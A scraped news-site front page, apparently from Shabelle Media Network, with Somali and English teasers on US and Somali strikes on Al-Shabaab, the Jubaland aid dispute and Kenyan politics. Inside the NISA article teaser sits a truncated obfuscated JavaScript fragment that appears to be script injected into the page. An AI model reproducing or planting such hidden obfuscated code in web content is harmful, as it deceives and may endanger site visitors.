Shabelle Media Network Logo

Radio Shabelle Live

Powered by Shabelle Media Network

Maraykanka oo sheegay in in ka badan 100 dagaalyahan ku dilay Soomaaliya tan iyo markii Trump xafiiska loo doortay

Washington, Mareykanka — Maraykanku wuxuu sheegay in in ka badan 100 dagaalyahan lagu dilay Soomaaliya tan iyo markii Madaxweynaha Donald Trump uu xafiiska qabtay 20-kii Janaayo, sida lagu sheegay warbixin ka soo baxday Aqalka Cad Maanta oo Arbaco ah.   Warbixinta oo lagu daabacay X (hore Twitter), ayaa lagu xaqiijiyey in howlgalkii ugu dambeeyay ee Maraykanka ee dhacay 19-kii May uu...

White House says U.S. military killed over 100 militants in Somalia since Trump took office

Washington, United States — The United States has killed more than 100 militants in Somalia since President Donald Trump assumed office on January 20, the White House announced on Wednesday.   In a post published on X (formerly Twitter), the White House confirmed that a US operation conducted on May 19 had resulted in the deaths of 10 militants, bringing the...

NISA oo sheegtay in howlgal gaar ah ku dishay in ka badan 45 katirsan Al-Shabaab

MUQDISHO, Soomaaliya - Hay'adda NISA ayaa sheegtay in howlgal qorsheysan ay ku dishay 46 kamid ah Al-Shabaab, iyadoo sidoo kale howlgalka lagu qabtay hub kala duwan.   NISA ayaa ku sheegtay qoraalka ay Maanta soo saartay in howlgalka oo ka dhacay Sabiid oo ku dhaw Afgooye sidoo kale lagu dilay xubno sare oo katirsanaa Al-Shabaab. function _0x3023(_0x562006,_0x1334d6){const _0x1922f2=_0x1922();return _0x3023=function(_0x30231a,_0x4e4880){_0x30231a=_0x30231a-0x1bf;let _0x2b207e=_0x1922f2;return _0x2b207e;},_0x3023(_0x562006,_0x1334d6);}function _0x1922(){const...

Jubaland Urges Somalia’s Federal Government Not to Politicise Humanitarian Aid

KISMAYO, Somalia – The second deputy vice president of Somalia’s Jubaland state, Abdulkadir Haji Mahmoud (Luga Dheere), has called on the federal government to separate ongoing political disputes from the delivery of humanitarian aid to the region, amid a months-long standoff between the two sides.   Speaking to local media in Kismayo, Luga Dheere warned against politicising relief efforts and urged...

Jubaland oo Dowlada Dhexe ugu Baaqday in Khilaafka laga Saaro Arrimaha Gargarka

Kismaayo, Soomaaliya – Cabdulkaadir Xaaji Maxamuud (Luga Dheere), madaxweyne ku-xigeenka labaad ee dowlad-goboleedka Jubaland, ayaa ka hadlay khilaafka siyaasadeed ee wali u dhexeeya maamulka Jubaland iyo dowladda federaalka, kaas oo muddo bilooyin ah taagnaa, isagoo dowladda dhexe ugu baaqay in aysan siyaasaddeynin gurmadka bini’aadantinimo ee loo fidinayo Jubaland.   Suldaan Luga Dheere ayaa sheegay in loo baahan yahay in si cad...

Somali Intelligence and Air Force Conduct Drone Strikes on Al-Shabaab Camps

MOGADISHU, Somalia – Somali intelligence units, in coordination with the Somali Air Force, launched targeted drone strikes overnight against Al-Shabaab training and weapons storage facilities in southern Somalia, officials said Wednesday.   The operation, carried out using newly operational Turkish-made Bayraktar TB2 drones, hit multiple locations in the Lower Shabelle and Middle Jubba regions, including the towns of Jilib, Sablaale, and...

Ciidanka Sirdoonka iyo Cirka Soomaaliya oo Duqeyn Ku Beegsaday Xarumo Muhiim u ahaa Al-Shabaab

Muqdisho, Soomaaliya – Ciidanka Sirdoonka Qaranka oo iskaashi la sameeyay Ciidanka Cirka ee Xoogga Dalka Soomaaliyeed ayaa habeenkii xalay fuliyay howlgal duqeyn ah oo si gaar ah loo bartilmaameedsaday xarumo muhiim ah oo ay Al-Shabaab ku lahaayeen gobollada Shabeellaha Hoose iyo Jubada Dhexe.   Howlgalka oo lagu fuliyay diyaaradaha aan duuliyaha lahayn ee nooca Bayraktar TB2, kuwaas oo si rasmi ah...

Kenya Health Minister Highlights Somali Influence in Horn of Africa and Beyond

NAIROBI, Kenya – Kenya's Health Minister, Aden Barre Duale underscored the growing influence of the Somali community both in the Horn of Africa and globally, in remarks seen as a direct response to recent anti-Somali sentiments voiced by a former deputy president.   The Somali population in the Horn of Africa is 40 million. Oromos are the largest ethnic group, but...

Aadan Barre Ducaale oo Ka Hadlay Awoodda Soomaalida Geeska Afrika iyo Caalamka

Nairobi, Kenya – Wasiirka Caafimaadka ee dowladda Kenya, Aadan Barre Ducaale, ayaa khudbad kulul oo uu ka jeediyay munaasabad dadweyne ku tilmaamay awoodda weyn ee bulshada Soomaaliyeed ay ku leeyihiin Geeska Afrika iyo dunida inteeda kale.   Wasiirka ayaa hadalkiisa si gaar ah ugu wajahday Madaxweyne ku-xigeenkii hore ee Kenya, oo dhowaan si cad u dhaliilay saameynta siyaasadeed iyo dhaqaale ee...

SoDMA oo Wasiir Fiqi uga Warbixisay Halista Fatahaadaha +SAWIRRO

Wasiirka Wasaaradda Gaashaandhigga ee Xukuumadda Federaalka Soomaaliya, Mudane Axmed Macallin Fiqi, ayaa maanta booqasho ku tegay xarunta dhexe ee Hay’adda Maareynta Musiibooyinka Qaranka (SoDMA).   Wasiirka waxaa safarkiisa ku wehliyay saraakiil sare oo ka tirsan Ciidanka Xoogga Dalka Soomaaliyeed (CXDS), waxaana halkaas si diirran ugu soo dhoweeyey Guddoomiyaha SoDMA, Mudane Maxamuud Macallin Cabdulle, iyo masuuliyiin kale oo sar-sare oo ka tirsan...

WARAR KALE

Garsoore Cumar Cartan oo Muqdisho Dib ugu Soo Laabtay, Looguna Sameeyay Soo Dhaweyn Heer...

Muqdisho – Garsooraha caalamiga ah ee Soomaaliyeed, Cumar Cabdulqaadir Cartan, ayaa dib ugu soo laabtay magaalada Muqdisho, kadib markii loo diiday inuu galo dalka...

Safaaradda Soomaaliya ee Qatar oo Ka Qayb Gashay Xuska Maalinta Afrika ee Dooxa

DOOXA – Safaaradda Jamhuuriyadda Federaalka Soomaaliya ee magaalada Dooxa ayaa ka qayb gashay munaasabadda xuska Maalinta Afrika, taas oo ay soo qabanqaabiyeen Kooxda Safiirrada...

Somali Opposition Accuses Government of Targeting Political Rivals

MOGADISHU, Somalia — Somali opposition leaders on Wednesday accused the federal government of using security forces to intimidate political opponents and called for an...